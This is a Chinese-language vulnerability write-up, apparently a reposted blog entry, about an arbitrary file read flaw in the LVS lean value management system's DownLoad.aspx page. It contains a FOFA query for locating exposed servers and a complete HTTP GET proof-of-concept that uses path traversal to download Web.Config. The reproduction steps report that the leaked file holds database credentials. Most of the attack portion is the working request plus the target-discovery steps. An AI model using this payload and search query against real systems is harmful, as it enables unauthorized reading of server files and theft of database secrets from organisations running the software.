首页 > 编程语言 >LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞

LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞

时间:2024-05-26 17:33:19浏览次数:18  
标签:文件 读取 LVS xxx DownLoad aspx

漏洞描述

该漏洞允许攻击者通过构造特定的请求,读取服务器上的任意文件,从而可能导致敏感信息泄露。DownLoad.aspx页面接受一个文件路径作为参数,并直接将其传递给文件读取函数。这个函数没有经过严格的检查和过滤,攻击者可以通过构造恶意请求,包含相对路径或绝对路径,从而读取服务器上的任意文件

fofa

body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"

POC

GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

漏洞复现

在fofa中搜索资产,共有97条数据匹配

image-20240526134501175

访问目标网站

image-20240526134547842

构造url进行访问

image-20240526134805006

url虽然跳转回了登录页,但是下载了一个web.config文件

打开文件查看,存在数据库敏感信息

image-20240526134935055

标签:文件,读取,LVS,xxx,DownLoad,aspx
From: https://www.cnblogs.com/LeouMaster/p/18214025

相关文章

  • tensorflow.js示例笔记 - predict-download-time
    预测下载时间。<!DOCTYPEhtml><html><head><title>predict-download-time</title><style>canvas{border:1pxsolid#d3d3d3;}</style><sc......
  • C# webform 在aspx页面调用aspx.cs页面的方法
    前台代码--调用后台的GetEcharts1方法,并传入三个参数startDateValue,ipEndDate,ddlTypeValue<inputtype="button"id="loadExce2l"value="查看"onclick="loadEcharts()"/>functionloadEcharts(){console.log(19999999999)......
  • Centos 无法使用yum 错误:Failed to download metadata for repo ‘AppStream’: Canno
    大家都知道Centos8于2021年年底停止了服务,大家再在使用yum源安装时候,出现下面错误“错误:Failedtodownloadmetadataforrepo‘AppStream’:Cannotprepareinternalmirrorlist:NoURLsinmirrorlist”1、进入yum的repos目录 复制cd/etc/yum.repos.d/ ......
  • RPhy2025电阻与温度换算计算器Resistor and temperature computer 2025 download
    本计算器可以计算电阻当前值、20摄氏度时的标准值、当前温度、温度差值、电阻温度系数之间的计算。本计算器带一个常见的物质的电阻温度系数的选择表。本软件是x64的软件,支持Win平台。价格便宜,只要50人民币或15美元或者欧元即可长期合法使用。价格廉价,没人付不起。Thiscalcula......
  • 用友畅捷通TPlus-keyEdit.aspx接口存在SQL注入漏洞
    漏洞描述:该漏洞是由于畅捷通T的/tplus/UFAQD/keyEdit.asp接口处未对用户的输入进行过滤和校验,未经身份验证的攻击者可以利用SQL注入漏洞获取数据库中的信息fofa:app="畅捷通-TPlus"POC:GET/tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preloa......
  • 4-LVS命令详解
    4.LVS命令详解集群定义一组通过高速网络互联的计算机,以单一系统的模式加以管理;将很多服务器集中起来一起,提供同一种服务,在客户端看起来就像是只有一个服务器,可以在付出较低成本的情况下获得在性能、可靠性、灵活性方面的相对较高的收益目的、优点提高性能、降低成本、提高可扩......
  • 5-Keepalived_LVS-NAT
    5.Keepalived+LVS-NATKeepalived高可用服务器访问虚拟IP192.168.4.80配置环境web1和web2 安装http,写个测试页面yuminstall-ykeepalived修改配置修改web1服务器Keepalived配置文件vim/etc/keepalived/keepalived.confglobal_defs{  notification_email{ ......
  • 1-部署LVS-NAT
    1.部署LVS-NAT部署LVS-NAT集群主机名IP地址clienteth0:192.168.4.10/24proxyeth1:192.168.2.5/24eth0:192.168.4.5/24web1eth0:192.168.2.100/24web2eth0:192.168.2.200/24客户端访问LVS调度器的外网IP(VIP),调度器根据算法选择后端的一台真实服务......
  • 2-部署LVS-DR
    2.部署LVS-DR主机IPclienteth0:192.168.4.10/24proxyeth0:0:192.168.4.15/24eth0:192.168.4.5/24web1lo:0:192.168.4.15/32eth0:192.168.4.100/24web2lo:0:192.168.4.15/32eth0:192.168.4.200/24DR原理通过为请求报文重新封装一个......
  • 3-LVS工作模式
    3.LVS工作模式NAT  TUN  DRhttps://blog.csdn.net/weixin_40470303/article/details/80541639NAT1.LVS服务器配两块网卡,一块连公网与用户通信,一块连内网与集群通信2.负载路由器充当网关3.支持端口映射,后端真实服务器的地址可能不是80,而是80804.集群节点处于一个网络......